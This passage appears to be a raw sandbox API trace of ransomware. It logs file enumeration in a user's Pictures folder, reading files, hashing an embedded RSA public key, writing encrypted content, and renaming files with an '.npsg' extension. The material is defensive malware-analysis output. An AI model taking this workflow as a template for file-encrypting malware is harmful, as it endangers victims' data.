| out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.404] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x13e7b, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x13e7b, lpOverlapped=0x0) returned 1 [0239.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0239.405] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13e80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.405] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0239.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0239.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0239.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0239.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0239.405] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0239.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.405] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.405] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.405] CloseHandle (hObject=0x644) returned 1 [0239.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b89cd0 [0239.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.407] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\bH_TctCtrR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\bh_tctctrr.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\bH_TctCtrR.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\bh_tctctrr.bmp.npsg")) returned 1 [0239.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.408] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0239.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4709ef0, ftCreationTime.dwHighDateTime=0x1d5c266, ftLastAccessTime.dwLowDateTime=0x48ec5f10, ftLastAccessTime.dwHighDateTime=0x1d5ba2e, ftLastWriteTime.dwLowDateTime=0x48ec5f10, ftLastWriteTime.dwHighDateTime=0x1d5ba2e, nFileSizeHigh=0x0, nFileSizeLow=0x7ac6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qNIL51f-5GrV.jpg", cAlternateFileName="QNIL51~1.JPG")) returned 1 [0239.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0239.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0239.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0239.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\qNIL51f-5GrV.jpg") returned=".jpg" [0239.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\qNIL51f-5GrV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\qnil51f-5grv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.410] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=31430) returned 1 [0239.410] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.412] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.412] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.414] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.414] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x7ac6, lpOverlapped=0x0) returned 1 [0239.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.415] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.415] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.416] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.416] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.416] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.416] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.416] GetLastError () returned 0x0 [0239.416] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.416] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.416] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.416] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.416] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7ad0) returned 0x3b95d50 [0239.416] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b868b8 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d60 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86900 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d18 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88da8 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d90 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.417] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d90 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88da8 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.418] GetCurrentThreadId () returned 0x5b4 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b88368 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.418] GetCurrentThreadId () returned 0x5b4 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88dc0 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88da8 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d90 [0239.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d48 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dd8 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88df0 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d30 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88da8 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0239.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88df0 | out: hHeap=0x620000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 